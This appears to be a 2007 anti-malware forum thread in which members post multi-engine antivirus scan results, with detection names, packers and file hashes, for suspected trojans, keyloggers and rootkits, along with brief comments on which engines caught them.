NOD32v2	2467	2007.08.16	-
Norman	5.80.02	2007.08.16	-
Panda	9.0.0.4	2007.08.17	-
Prevx1	V2	2007.08.17	Covert.Code
Rising	19.36.42.00	2007.08.17	-
Sophos	4.20.0	2007.08.12	-
Sunbelt	2.2.907.0	2007.08.17	Trojan.Win32.Agent.alt
Symantec	10	2007.08.17	Backdoor.Trojan
TheHacker	6.1.8.170	2007.08.17	-
VBA32	3.12.2.2	2007.08.16	-
VirusBuster	4.3.26:9	2007.08.16	-
Webwasher-Gateway	6.0.1	2007.08.17	Trojan.Downloader.Win32.ModifiedUPX.gen (suspicious)
Additional information
File size: 51200 bytes
MD5: 7bdb28eaea32a09034c073b2b4aaae86
SHA1: 242fa38659de1773356b7c7804bf81b77af38184
packers: UPX
```



```
File zzmfk32.dll received on 08.17.2007 12:15:29 (CET)
Antivirus	Version	Last Update	Result
AhnLab-V3	2007.8.15.0	2007.08.17	-
AntiVir	7.4.1.62	2007.08.17	TR/Crypt.ULPM.Gen
Authentium	4.93.8	2007.08.17	-
Avast	4.7.1029.0	2007.08.16	-
AVG	7.5.0.476	2007.08.16	Proxy.SMX
BitDefender	7.2	2007.08.17	-
CAT-QuickHeal	9.00	2007.08.16	-
ClamAV	0.91	2007.08.16	-
DrWeb	4.33	2007.08.17	-
eSafe	7.0.15.0	2007.08.16	Win32.Nibu
eTrust-Vet	31.1.5067	2007.08.17	-
Ewido	4.0	2007.08.16	-
FileAdvisor	1	2007.08.17	-
Fortinet	2.91.0.0	2007.08.16	-
F-Prot	4.3.2.48	2007.08.16	-
F-Secure	6.70.13030.0	2007.08.17	W32/Horst.gen29
Ikarus	T3.1.1.12	2007.08.17	-
Kaspersky	4.0.2.24	2007.08.17	-
McAfee	5099	2007.08.16	-
Microsoft	1.2803	2007.08.17	-
NOD32v2	2467	2007.08.16	-
Norman	5.80.02	2007.08.16	W32/Horst.gen29
Panda	9.0.0.4	2007.08.17	Generic Malware
Prevx1	V2	2007.08.17	Generic.Malware
Rising	19.36.42.00	2007.08.17	-
Sophos	4.20.0	2007.08.12	Mal/Packer
Sunbelt	2.2.907.0	2007.08.17	Backdoor.Nibu
Symantec	10	2007.08.17	Backdoor.Nibu
TheHacker	6.1.8.170	2007.08.17	-
VBA32	3.12.2.2	2007.08.16	suspected of Embedded.Trojan.NtRootKit.331
VirusBuster	4.3.26:9	2007.08.16	-
Webwasher-Gateway	6.0.1	2007.08.17	Trojan.Crypt.ULPM.Gen
Additional information
File size: 35605 bytes
MD5: 9e4295ea204dc617d79e81fc70a2e720
SHA1: 7b24eda6f71235fc1895416c297eb18bce2f8ec7
```



```
File reveal32.sys received on 08.17.2007 12:55:44 (CET)
Antivirus	Version	Last Update	Result
AhnLab-V3	2007.8.15.0	2007.08.17	-
AntiVir	7.4.1.62	2007.08.17	-
Authentium	4.93.8	2007.08.17	-
Avast	4.7.1029.0	2007.08.16	-
AVG	7.5.0.476	2007.08.16	-
BitDefender	7.2	2007.08.17	-
CAT-QuickHeal	9.00	2007.08.16	-
ClamAV	0.91	2007.08.16	-
DrWeb	4.33	2007.08.17	Trojan.NtRootKit.331
eSafe	7.0.15.0	2007.08.16	-
eTrust-Vet	31.1.5067	2007.08.17	-
Ewido	4.0	2007.08.17	-
FileAdvisor	1	2007.08.17	-
Fortinet	2.91.0.0	2007.08.16	-
F-Prot	4.3.2.48	2007.08.16	-
F-Secure	6.70.13030.0	2007.08.17	-
Ikarus	T3.1.1.12	2007.08.17	-
Kaspersky	4.0.2.24	2007.08.17	-
McAfee	5099	2007.08.16	-
Microsoft	1.2803	2007.08.17	-
NOD32v2	2467	2007.08.16	-
Norman	5.80.02	2007.08.16	-
Panda	9.0.0.4	2007.08.17	-
Rising	19.36.42.00	2007.08.17	-
Sophos	4.20.0	2007.08.12	-
Sunbelt	2.2.907.0	2007.08.17	-
Symantec	10	2007.08.17	-
TheHacker	6.1.8.170	2007.08.17	-
VBA32	3.12.2.2	2007.08.16	Trojan.NtRootKit.331
VirusBuster	4.3.26:9	2007.08.16	-
Webwasher-Gateway	6.0.1	2007.08.17	-
Additional information
File size: 14848 bytes
MD5: e79b7e3aada4461c8a94812fc2036e88
SHA1: ad9230b49d376a9e5ac4dbf3c7a6065d480fd203
```

----------


## Синауридзе Александр

File msdnc0.exe received on 08.19.2007 06:22:18 (CET)

Antivirus 	Version 	Last Update 	Result
AhnLab-V3	2007.8.18.0	2007.08.18	-
*AntiVir	7.4.1.62	2007.08.19	TR/Crypt.XPACK.Gen*
Authentium	4.93.8	2007.08.17	-
Avast	4.7.1029.0	2007.08.17	-
*AVG	7.5.0.484	2007.08.18	PSW.Ldpinch.NEK*
*BitDefender	7.2	2007.08.19	Trojan.PWS.LDPinch.TAW*
*CAT-QuickHeal	9.00	2007.08.18	TrojanPSW.LdPinch.bno*
ClamAV	0.91	2007.08.19	-
*DrWeb	4.33	2007.08.18	Trojan.PWS.LDPinch.1781*
*eSafe	7.0.15.0	2007.08.16	Win32.LdPinch.bno*
*eTrust-Vet	31.1.5069	2007.08.18	Win32/LdPinch.CM*
*Ewido	4.0	2007.08.18	Trojan.LdPinch.bno*
FileAdvisor	1	2007.08.19	-
*Fortinet	2.91.0.0	2007.08.18	W32/Basine.BNO!tr.pws*
F-Prot	4.3.2.48	2007.08.17	-
*F-Secure	6.70.13030.0	2007.08.17	Trojan-PSW.Win32.LdPinch.bno*
*Ikarus	T3.1.1.12	2007.08.18	Trojan-PWS.Win32.LdPinch.bno*
*Kaspersky	4.0.2.24	2007.08.19	Trojan-PSW.Win32.LdPinch.bno*
McAfee	5100	2007.08.17	-
*Microsoft	1.2803	2007.08.19	TrojanDownloader:Win32/Small.CBA*
NOD32v2	2469	2007.08.18	-
*Norman	5.80.02	2007.08.17	LdPinch.JVR*
*Panda	9.0.0.4	2007.08.18	Generic Trojan*
*Prevx1	V2	2007.08.19	Generic.Malware*
*Rising	19.36.60.00	2007.08.19	Packer.RyCrypt*
*Sophos	4.20.0	2007.08.12	Mal/Basine-C*
*Sunbelt	2.2.907.0	2007.08.18	Trojan-PSW.Win32.LdPinch.bno*
*Symantec	10	2007.08.19	Infostealer.Ldpinch*
*TheHacker	6.1.8.170	2007.08.17	Trojan/PSW.LdPinch.bno*
VBA32	3.12.2.2	2007.08.17	-
*VirusBuster	4.3.26:9	2007.08.18	Trojan.DR.Cimuz.Gen.1*
*Webwasher-Gateway	6.0.1	2007.08.19	Trojan.Crypt.XPACK.Gen*

Additional information
File size: 58634 bytes
MD5: 58a71e7c9edefb1270c2292318a61ff6
SHA1: a3efc9514ea657dbcce516f06532af81b3b03091
packers: RCrypt
Prevx info: http://fileinfo.prevx.com/fileinfo.a...4F610014A92673

----------


## urbanangel

File D3DGear_v1.96_Keygen.exe received on 08.20.2007 22:18:12 (CET)
Current status: finished 
Result: 22/32 (68.75%) 

Antivirus Version Last Update Result 
*AhnLab-V3 2007.8.21.0 2007.08.20 Win-Trojan/Ardamax.320830* 
AntiVir 7.4.1.62 2007.08.20 - 
*Authentium 4.93.8 2007.08.20 W32/Trojan.ATHZ* 
*Avast 4.7.1029.0 2007.08.20 Win32:Ardamax-CJ* 
*AVG 7.5.0.484 2007.08.20 PSW.Generic4.TGX* 
*BitDefender 7.2 2007.08.20 Application.Ardamax.AK* 
*CAT-QuickHeal 9.00 2007.08.20 TrojanSpy.Ardamax.j* 
*ClamAV 0.91 2007.08.20 Trojan.Spy.Ardamax-25* 
DrWeb 4.33 2007.08.20 - 
*eSafe 7.0.15.0 2007.08.20 Win32.Ardamax.j* 
eTrust-Vet 31.1.5069 2007.08.18 - 
*Ewido 4.0 2007.08.20 Logger.Ardamax.i* 
FileAdvisor 1 2007.08.20 - 
*Fortinet 2.91.0.0 2007.08.20 Spy/Ardamax* 
*F-Prot 4.3.2.48 2007.08.20 W32/Trojan.ATHZ* 
*F-Secure 6.70.13030.0 2007.08.20 Trojan-Spy.Win32.Ardamax.j* 
*Ikarus T3.1.1.12 2007.08.20 Trojan-Spy.Win32.Ardamax.j* 
Kaspersky 4.0.2.24 2007.08.20 - 
*McAfee 5101 2007.08.20 Keylog-Ardamax.dr.gen* 
Microsoft 1.2803 2007.08.20 - 
*NOD32v2 2471 2007.08.20 probably a variant of Win32/Keylogger.Ardamax* 
*Norman 5.80.02 2007.08.20 W32/Ardamax.CLC* 
Panda 9.0.0.4 2007.08.19 - 
*Prevx1 V2 2007.08.20 Generic.Malware* 
*Rising 19.36.60.00 2007.08.19 Trojan.Spy.Win32.Ardamax.l* 
Sophos 4.20.0 2007.08.12 - 
Sunbelt 2.2.907.0 2007.08.18 - 
*Symantec 10 2007.08.20 Spyware.Ardakey* 
*TheHacker 6.1.8.171 2007.08.20 Trojan/Spy.Ardamax.j* 
*VBA32 3.12.2.2 2007.08.20 Trojan-Spy.Win32.Ardamax.j* 
VirusBuster 4.3.26:9 2007.08.20 - 
*Webwasher-Gateway 6.0.1 2007.08.20 Riskware.Ardamax.K.Gen* 
Additional information 
File size: 347562 bytes 
MD5: 9a471ee529efe82d02760d2dcb4888a8 
SHA1: 67504fd4656b7529c6c97058f3cd65ea5e5219f2 
packers: ZLIB 
Prevx info: http://fileinfo.prevx.com/fileinfo.a...E44700A873A9B3

----------


## Muzzle

topic  t=11836
file *Dert69.sys* 



> AhnLab-V3	2007.8.21.0	2007.08.20	-
> AntiVir	7.4.1.62	2007.08.20	RKit/Agent.EA.40
> Authentium	4.93.8	2007.08.20	-
> Avast	4.7.1029.0	2007.08.20	Win32:Agent-FTK
> AVG	7.5.0.484	2007.08.20	BackDoor.Generic8.CJX
> BitDefender	7.2	2007.08.21	-
> CAT-QuickHeal	9.00	2007.08.20	Rootkit.Agent.ea
> ClamAV	0.91	2007.08.21	-
> DrWeb	4.33	2007.08.20	Trojan.Spambot.2400
> ...

----------


## Jolly Rojer

File firewall.exe received on 08.21.2007 03:32:41 (CET)
Current status:   finished 
Result: 13/32 (40.63%) 
Antivirus	Version	Last Update	Result
AhnLab-V3	2007.8.21.0	2007.08.20	-
*AntiVir	7.4.1.62	2007.08.20	BDS/Agent.YRG.12*
Authentium	4.93.8	2007.08.20	-
Avast	4.7.1029.0	2007.08.20	-
*AVG	7.5.0.484	2007.08.20	Worm/Agobot.FVW
BitDefender	7.2	2007.08.21	MemScan:Backdoor.Agent.YRG*
*CAT-QuickHeal	9.00	2007.08.20	(Suspicious) - DNAScan*
ClamAV	0.91	2007.08.21	-
DrWeb	4.33	2007.08.20	-
*eSafe	7.0.15.0	2007.08.20	suspicious Trojan/Worm*
eTrust-Vet	31.1.5069	2007.08.18	-
*Ewido	4.0	2007.08.20	Backdoor.PoeBot.o*
FileAdvisor	1	2007.08.21	-
Fortinet	2.91.0.0	2007.08.20	-
F-Prot	4.3.2.48	2007.08.20	-
F-Secure	6.70.13030.0	2007.08.21	-
*Ikarus	T3.1.1.12	2007.08.20	MemScanBackdoor.Agent.YRG*
Kaspersky	4.0.2.24	2007.08.21	-
McAfee	5101	2007.08.20	-
*Microsoft	1.2803	2007.08.21	Exploit:Win32/MS06040.gen
NOD32v2	2472	2007.08.21	a variant of Win32/Poebot*
Norman	5.80.02	2007.08.20	-
*Panda	9.0.0.4	2007.08.19	Suspicious file
Prevx1	V2	2007.08.21	Trojan.SystemPoser*
Rising	19.36.60.00	2007.08.19	-
Sophos	4.20.0	2007.08.12	-
*Sunbelt	2.2.907.0	2007.08.21	VIPRE.Suspicious*
Symantec	10	2007.08.21	-
TheHacker	6.1.8.171	2007.08.20	-
VBA32	3.12.2.2	2007.08.21	-
VirusBuster	4.3.26:9	2007.08.20	-
*Webwasher-Gateway	6.0.1	2007.08.21	Trojan.Agent.YRG.12*
Additional information
File size: 50142 bytes
MD5: 0fcde95916fcc23ecbed1b47632cd74c
SHA1: c2dd58be2f5ddfbf89c8ababf07009034bdfbfdd

----------


## santy

File file.exe received on 08.21.2007 10:15:10 (CET)
Current status: finished
Result: 18/31 (58.07%)

Antivirus Version Last Update Result
*AhnLab-V3 2007.8.21.2 2007.08.21 Win-Trojan/Downloader.10330*
*AntiVir 7.4.1.62 2007.08.21 TR/Dldr.Small.ezc*
*Authentium 4.93.8 2007.08.20 W32/Downloader.gen10*
Avast 4.7.1029.0 2007.08.20 -
*AVG 7.5.0.484 2007.08.20 Downloader.Generic5.QZX*
*BitDefender 7.2 2007.08.21 BehavesLike:Trojan.Downloader*
CAT-QuickHeal 9.00 2007.08.20 -
ClamAV 0.91 2007.08.21 -
*DrWeb 4.33 2007.08.20 Trojan.DownLoader.29701*
*eSafe 7.0.15.0 2007.08.20 Win32.Small.ezc*
eTrust-Vet 31.1.5076 2007.08.21 -
Ewido 4.0 2007.08.20 -
FileAdvisor 1 2007.08.21 -
*Fortinet 2.91.0.0 2007.08.21 W32/Small.EZC!tr.dldr*
*F-Prot 4.3.2.48 2007.08.20 W32/Downloader.gen10*
*F-Secure 6.70.13030.0 2007.08.21 Trojan-Downloader.Win32.Small.ezc*
*Ikarus T3.1.1.12 2007.08.21 Trojan-Downloader.Win32.Small.ezc*
Kaspersky 4.0.2.24 2007.08.21 -
McAfee 5101 2007.08.20 -
*Microsoft 1.2803 2007.08.21 TrojanDownloader:Win32/Small.gen!O*
*NOD32v2 2472 2007.08.21 probably unknown NewHeur_PE virus*
*Norman 5.80.02 2007.08.20 W32/DLoader.DBTS*
Panda 9.0.0.4 2007.08.21 -
Prevx1 V2 2007.08.21 -
Rising 19.37.12.00 2007.08.21 -
*Sophos 4.20.0 2007.08.21 Mal/TinyDL-L*
*Sunbelt 2.2.907.0 2007.08.21 Trojan-Downloader.Win32.Small.gen!O*
Symantec 10 2007.08.21 -
*TheHacker 6.1.8.171 2007.08.21 Trojan/Downloader.Small.ezc*
*VBA32 3.12.2.2 2007.08.21 Trojan-Downloader.Win32.Small.ezc*
VirusBuster 4.3.26:9 2007.08.20 -
Additional information
File size: 10332 bytes
MD5: 4f30c174ae755b88aad65eda62549800
SHA1: 5bd178a6a4fea918d77ad19391eb05548688a80d

----------



## XL

> File applet.exe received on 08.21.2007 19:24:11 (CET)
> Current status:    finished 
> Result: 16/32 (50%) 
> Antivirus	Version	Last Update	Result
> AhnLab-V3	2007.8.22.0	2007.08.21	-
> *AntiVir	7.4.1.62	2007.08.21	WORM/Zhelatin.Gen*
> *Authentium	4.93.8	2007.08.20	Possibly a new variant of W32/Fathom.2-based!Maximus*
> *Avast	4.7.1029.0	2007.08.21	Win32helatin-ANZ*
> ...


Kaspersky and NOD let us down... or just haven't caught up yet  :Smiley: 

****




> File Dumped.sys received on 08.21.2007 19:33:40 (CET)
> Current status:    finished 
> Result: 4/32 (12.5%) 
> Antivirus	Version	Last Update	Result
> AhnLab-V3	2007.8.22.0	2007.08.21	-
> AntiVir	7.4.1.62	2007.08.21	-
> Authentium	4.93.8	2007.08.20	-
> *Avast	4.7.1029.0	2007.08.21	Win32:Agent-FTK*
> ...


And this is the detection for a dump taken with RKU from a critter today. I fought with it for more than half an hour, in the end not without success. It looks a lot like Trojan.Srizbi, the kill script for which is being discussed in the closed section of the forum.

----------


## vaber

> It looks a lot like Trojan.Srizbi, the kill script for which is being discussed in the closed section of the forum.


That's exactly what it is  :Smiley:  Kaspersky detects Srizbi precisely as Rootkit.Win32.Agent.ea. And the Ikarus verdict = Kaspersky

----------


## Winsent

File 1.exe received on 08.24.2007 05:41:04 (CET)
Current status:    finished 
Result: 12/32 (37.5%)


Antivirus	Version	Last Update	Result

AhnLab-V3	2007.8.22.0	2007.08.24	-
*AntiVir	7.4.1.63	2007.08.23	DR/Delphi.Gen*
Authentium	4.93.8	2007.08.23	-
*Avast	4.7.1029.0	2007.08.24	Win32dPinch-NO*
AVG	7.5.0.484	2007.08.23	-
*BitDefender	7.2	2007.08.24	MemScan:Trojan.PWS.LdPinch.BSG*
CAT-QuickHeal	9.00	2007.08.23	-
*ClamAV	0.91	2007.08.24	Trojan.Dropper.Delf-65
DrWeb	4.33	2007.08.23	Trojan.PWS.LDPinch.1467
eSafe	7.0.15.0	2007.08.23	Suspicious Trojan/Worm*
eTrust-Vet	31.1.5083	2007.08.24	-
Ewido	4.0	2007.08.23	-
FileAdvisor	1	2007.08.24	-
Fortinet	2.91.0.0	2007.08.24	-
F-Prot	4.3.2.48	2007.08.23	-
F-Secure	6.70.13030.0	2007.08.24	-
Ikarus	T3.1.1.12	2007.08.24	-
*Kaspersky	4.0.2.24	2007.08.24	Trojan-Dropper.Win32.Agent.bqb
McAfee	5104	2007.08.23	W32/Generic.Delphi.b*
Microsoft	1.2803	2007.08.24	-
*NOD32v2	2481	2007.08.24	a variant of Win32/PSW.LdPinch.NCB*
Norman	5.80.02	2007.08.23	-
*Panda	9.0.0.4	2007.08.24	Suspicious file*
Prevx1	V2	2007.08.24	-
Rising	19.37.40.00	2007.08.24	-
Sophos	4.20.0	2007.08.24	-
Sunbelt	2.2.907.0	2007.08.24	-
Symantec	10	2007.08.24	-
TheHacker	6.1.8.172	2007.08.24	-
*VBA32	3.12.2.3	2007.08.23	MalwareScope.Trojan-PSW.Pinch.1*
VirusBuster	4.3.26:9	2007.08.23	-
*Webwasher-Gateway	6.0.1	2007.08.24	Trojan.Delphi.Gen*

Additional information
File size: 78160 bytes
MD5: df12100205b0d79efb9129c8a34a75cd
SHA1: 9022ae857bc001aa2b1a008b87bb2c52b9c33167
packers: PECompact
packers: BINARYRES, PECOMPACT
packers: PecBundle, PECompact

----------


## Winsent

File sobchak.scr received on 08.27.2007 19:50:49 (CET)
Current status:    finished 
Result: 15/32 (46.88%) 


Antivirus	Version	Last Update	Result

AhnLab-V3	2007.8.28.0	2007.08.27	-
*AntiVir	7.4.1.63	2007.08.27	TR/Crypt.XPACK.Gen*
Authentium	4.93.8	2007.08.26	-
Avast	4.7.1029.0	2007.08.27	-
*AVG	7.5.0.484	2007.08.27	Win32/PolyCrypt
BitDefender	7.2	2007.08.27	Trojan.PWS.LDPinch.TAW*
CAT-QuickHeal	9.00	2007.08.25	-
ClamAV	0.91	2007.08.27	-
DrWeb	4.33	2007.08.27	-
*eSafe	7.0.15.0	2007.08.26	Suspicious Trojan/Worm*
eTrust-Vet	31.1.5088	2007.08.27	-
Ewido	4.0	2007.08.27	-
FileAdvisor	1	2007.08.27	-
Fortinet	2.91.0.0	2007.08.27	-
F-Prot	4.3.2.48	2007.08.26	-
*F-Secure	6.70.13260.0	2007.08.27	Trojan-PSW.Win32.LdPinch.ckf
Ikarus	T3.1.1.12	2007.08.27	Trojan-PWS.Win32.Lmir.AGP
Kaspersky	4.0.2.24	2007.08.27	Packed.Win32.PolyCrypt.d
McAfee	5106	2007.08.27	New Malware.ek
Microsoft	1.2803	2007.08.27	TrojanDownloader:Win32/Small.CBA*
NOD32v2	2486	2007.08.27	-
*Norman	5.80.02	2007.08.27	Suspicious_P.gen*
Panda	9.0.0.4	2007.08.27	-
Prevx1	V2	2007.08.27	-
*Rising	19.38.02.00	2007.08.27	Packer.RyCrypt
Sophos	4.21.0	2007.08.27	Mal/AvPak
Sunbelt	2.2.907.0	2007.08.25	VIPRE.Suspicious*
Symantec	10	2007.08.27	-
TheHacker	6.1.9.173	2007.08.27	-
VBA32	3.12.2.3	2007.08.27	-
*VirusBuster	4.3.26:9	2007.08.27	Trojan.DR.Cimuz.Gen.1
Webwasher-Gateway	6.0.1	2007.08.27	Trojan.Crypt.XPACK.Gen*

Additional information
File size: 66755 bytes
MD5: ef2e89c62eedfa555665d344d3cf8abe
SHA1: a051df1f7eeb005bb568be9c0948a90b76e4b53f
packers: RCrypt
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

----------


## Shu_b

t-11969

File avz00002.dta received on 08.28.2007 13:21:31 (CET)
Antivirus	Version	Last Update	Result
AhnLab-V3	2007.8.28.2	2007.08.28	-
*AntiVir	7.4.1.63	2007.08.28	TR/Agent.GBC*
Authentium	4.93.8	2007.08.28	-
Avast	4.7.1029.0	2007.08.27	-
*AVG	7.5.0.484	2007.08.27	SHeur.DLP*
*BitDefender	7.2	2007.08.28	BehavesLike:Trojan.StartPage*
*CAT-QuickHeal	9.00	2007.08.25	(Suspicious) - DNAScan*
ClamAV	0.91	2007.08.28	-
*DrWeb	4.33	2007.08.28	modification of Trojan.Packed.162*
*eSafe	7.0.15.0	2007.08.26	-1646264482*
eTrust-Vet	31.1.5091	2007.08.28	-
Ewido	4.0	2007.08.27	-
FileAdvisor	1	2007.08.28	-
Fortinet	2.91.0.0	2007.08.28	-
F-Prot	4.3.2.48	2007.08.28	-
F-Secure	6.70.13030.0	2007.08.28	-
*Ikarus	T3.1.1.12	2007.08.28	BehavesLikeTrojan.StartPage*
Kaspersky	4.0.2.24	2007.08.28	-
McAfee	5106	2007.08.27	-
Microsoft	1.2803	2007.08.28	-
NOD32v2	2488	2007.08.28	-
Norman	5.80.02	2007.08.28	-
*Panda	9.0.0.4	2007.08.28	Trj/Agent.GBC*
*Prevx1	V2	2007.08.28	Trojan.SystemPoser*
*Rising	19.38.12.00	2007.08.28	Trojan.Win32.Agent.gbc*
Sophos	4.21.0	2007.08.28	-
*Sunbelt	2.2.907.0	2007.08.25	VIPRE.Suspicious*
Symantec	10	2007.08.28	-
TheHacker	6.1.9.175	2007.08.28	-
VBA32	3.12.2.3	2007.08.28	-
VirusBuster	4.3.26:9	2007.08.27	-
*Webwasher-Gateway	6.0.1	2007.08.28	Trojan.Agent.GBC*
Additional information
File size: 45743 bytes
MD5: 7ed38b35477c4be7ea4aae15478b6ef7
SHA1: 30ac390cd908a4773f47205d621afe0d0a502f04

*Added 28 minutes later*

File http__www.****.com_youtube__w received on 08.28.2007 14:01:03 (CET)
Antivirus	Version	Last Update	Result
AhnLab-V3	2007.8.28.2	2007.08.28	-
*AntiVir	7.4.1.63	2007.08.28	HEUR/Malware*
Authentium	4.93.8	2007.08.28	-
Avast	4.7.1029.0	2007.08.27	-
*AVG	7.5.0.484	2007.08.27	Generic6.ULJ
BitDefender	7.2	2007.08.28	Dropped:Generic.Malware.Yddld!!.ACDA918A*
CAT-QuickHeal	9.00	2007.08.25	-
*ClamAV	0.91	2007.08.28	Trojan.Dropper-2269*
DrWeb	4.33	2007.08.28	-
*eSafe	7.0.15.0	2007.08.26	suspicious Trojan/Worm*
eTrust-Vet	31.1.5091	2007.08.28	-
Ewido	4.0	2007.08.27	-
FileAdvisor	1	2007.08.28	-
*Fortinet	2.91.0.0	2007.08.28	W32/Agent.AVM!tr*
F-Prot	4.3.2.48	2007.08.28	-
*F-Secure	6.70.13030.0	2007.08.28	Trojan.Win32.Agent.avm
Ikarus	T3.1.1.12	2007.08.28	Win32.SuspectCrc
Kaspersky	4.0.2.24	2007.08.28	Trojan.Win32.Agent.avm*
McAfee	5106	2007.08.27	-
Microsoft	1.2803	2007.08.28	-
NOD32v2	2488	2007.08.28	-
*Norman	5.80.02	2007.08.28	W32/Malware
Panda	9.0.0.4	2007.08.28	Trj/Downloader.MDW*
Prevx1	V2	2007.08.28	-
Rising	19.38.12.00	2007.08.28	-
*Sophos	4.21.0	2007.08.28	Mal/Generic-A*
Sunbelt	2.2.907.0	2007.08.25	-
Symantec	10	2007.08.28	-
*TheHacker	6.1.9.175	2007.08.28	Trojan/Agent.avm
VBA32	3.12.2.3	2007.08.28	Trojan.Win32.Agent.avm*
VirusBuster	4.3.26:9	2007.08.27	-
*Webwasher-Gateway	6.0.1	2007.08.28	Heuristic.Malware*
Additional information
File size: 113152 bytes
MD5: a2880ae984568cf6708500f7d719ddf5
SHA1: 9b0e5f41dc7ea8f74c209d99f5b4a83a5ada06c4
packers: UPX
packers: UPX, BINARYRES, UPX, BINARYRES

----------


## RobinFood

Looks like I have an epidemic  :Smiley: 

File ulsoxoi.exe received on 08.28.2007 13:51:20 (CET)
Antivirus Version Last Update Result 
*AhnLab-V3 2007.8.28.2 2007.08.28 Win32/IRCBot.worm.504480*
*AntiVir 7.4.1.63 2007.08.28 HEUR/Crypted*
Authentium 4.93.8 2007.08.28 - 
Avast 4.7.1029.0 2007.08.27 - 
*AVG 7.5.0.484 2007.08.27 SHeur.JOR*
*BitDefender 7.2 2007.08.28 DeepScan:Generic.Sdbot.F47A0C90*
*CAT-QuickHeal 9.00 2007.08.25 Backdoor.SdBot.gen*
ClamAV 0.91 2007.08.28 - 
DrWeb 4.33 2007.08.28 - 
eSafe 7.0.15.0 2007.08.26 - 
eTrust-Vet 31.1.5091 2007.08.28 - 
Ewido 4.0 2007.08.27 - 
FileAdvisor 1 2007.08.28 - 
Fortinet 2.91.0.0 2007.08.28 - 
F-Prot 4.3.2.48 2007.08.28 - 
F-Secure 6.70.13030.0 2007.08.28 - 
*Ikarus T3.1.1.12 2007.08.28 Generic.Sdbot*
Kaspersky 4.0.2.24 2007.08.28 - 
*McAfee 5106 2007.08.27 New Malware.gp*
Microsoft 1.2803 2007.08.28 - 
NOD32v2 2488 2007.08.28 - 
Norman 5.80.02 2007.08.28 - 
Panda 9.0.0.4 2007.08.28 - 
*Prevx1 V2 2007.08.28 Worm.Rbot*
Rising 19.38.12.00 2007.08.28 - 
Sophos 4.21.0 2007.08.28 - 
*Sunbelt 2.2.907.0 2007.08.25 VIPRE.Suspicious*
Symantec 10 2007.08.28 - 
TheHacker 6.1.9.175 2007.08.28 - 
VBA32 3.12.2.3 2007.08.28 - 
VirusBuster 4.3.26:9 2007.08.27 - 
*Webwasher-Gateway 6.0.1 2007.08.28 Heuristic.Crypted*
Additional information 
File size: 504480 bytes 
MD5: e36c441a19c72d71eea9e27a3f86c292 
SHA1: 679aabd092915d0e788b2b1b092e36b7a11424f5 
packers: Themida 
Prevx info: http://fileinfo.prevx.com/fileinfo.a...0E5300F089BAE4 
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

----------


## Shu_b

t=11980
File avz00001.dta received on 08.28.2007 20:47:31 (CET)
Antivirus	Version	Last Update	Result
AhnLab-V3	2007.8.29.0	2007.08.28	-
*AntiVir	7.4.1.63	2007.08.28	HEUR/Crypted*
Authentium	4.93.8	2007.08.28	-
Avast	4.7.1029.0	2007.08.28	-
AVG	7.5.0.484	2007.08.28	-
BitDefender	7.2	2007.08.28	-
CAT-QuickHeal	9.00	2007.08.25	-
ClamAV	0.91.2	2007.08.28	-
DrWeb	4.33	2007.08.28	-
*eSafe	7.0.15.0	2007.08.28	suspicious Trojan/Worm*
eTrust-Vet	31.1.5091	2007.08.28	-
Ewido	4.0	2007.08.28	-
FileAdvisor	1	2007.08.28	-
Fortinet	2.91.0.0	2007.08.28	-
F-Prot	4.3.2.48	2007.08.28	-
F-Secure	6.70.13030.0	2007.08.28	-
Ikarus	T3.1.1.12	2007.08.28	-
Kaspersky	4.0.2.24	2007.08.28	-
McAfee	5107	2007.08.28	-
*Microsoft	1.2803	2007.08.28	TrojanDownloader:Win32/Renos*
NOD32v2	2489	2007.08.28	-
Norman	5.80.02	2007.08.28	-
Panda	9.0.0.4	2007.08.28	-
*Prevx1	V2	2007.08.28	Spyware.WinAntiVirus*
Rising	19.38.12.00	2007.08.28	-
*Sophos	4.21.0	2007.08.28	Mal/EncPk-AV
Sunbelt	2.2.907.0	2007.08.25	VIPRE.Suspicious*
Symantec	10	2007.08.28	-
TheHacker	6.1.9.175	2007.08.28	-
VBA32	3.12.2.3	2007.08.28	-
VirusBuster	4.3.26:9	2007.08.28	-
*Webwasher-Gateway	6.0.1	2007.08.28	Heuristic.Crypted*

Additional information
File size: 16896 bytes
MD5: c4fd4f9445461a705798ee6a9b649caa
SHA1: 9fdcbec52d049ff502aba952cd6cf1b0ad79fde4

----------


## drongo

T=12012


```
 File avz00004.dta received on 08.30.2007 10:58:15 (CET)

	
Antivirus 	Version 	Last Update 	Result
AhnLab-V3	2007.8.29.0	2007.08.30	-
AntiVir	7.4.1.66	2007.08.30	TR/Dldr.ConHook.Gen
Authentium	4.93.8	2007.08.29	-
Avast	4.7.1029.0	2007.08.29	-
AVG	7.5.0.484	2007.08.29	BHO.AMJ
BitDefender	7.2	2007.08.30	MemScan:Trojan.Juan.V
CAT-QuickHeal	9.00	2007.08.30	-
ClamAV	0.91.2	2007.08.29	-
DrWeb	4.33	2007.08.30	Trojan.Virtumod
eSafe	7.0.15.0	2007.08.29	suspicious Trojan/Worm
eTrust-Vet	31.1.5095	2007.08.30	-
Ewido	4.0	2007.08.29	-
FileAdvisor	1	2007.08.30	-
Fortinet	3.11.0.0	2007.08.30	-
F-Prot	4.3.2.48	2007.08.29	-
F-Secure	6.70.13030.0	2007.08.30	-
Ikarus	T3.1.1.12	2007.08.30	MemScanTrojan.Juan.V
Kaspersky	4.0.2.24	2007.08.30	-
McAfee	5108	2007.08.29	-
Microsoft	1.2803	2007.08.30	-
NOD32v2	2491	2007.08.30	a variant of Win32/BHO.G
Norman	5.80.02	2007.08.29	Suspicious_R.gen
Panda	9.0.0.4	2007.08.29	Suspicious file
Prevx1	V2	2007.08.30	Generic.Malware
Rising	19.38.31.00	2007.08.30	-
Sophos	4.21.0	2007.08.30	-
Sunbelt	2.2.907.0	2007.08.25	Virtumonde
Symantec	10	2007.08.30	-
TheHacker	6.1.9.175	2007.08.30	-
VBA32	3.12.2.3	2007.08.28	Trojan.Virtumod
VirusBuster	4.3.26:9	2007.08.29	-
Webwasher-Gateway	6.0.1	2007.08.30	Trojan.Dldr.ConHook.Gen
Additional information
File size: 63598 bytes
MD5: 37ebe8949ae4f403aa037b184636d2c4
SHA1: d370ece1f3892d5b426e36cad93fd4b101f5dbc6
packers: RLPack
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PX5=ECD659906E6212C0F82E00C91BAEAC00B5ED8FAC
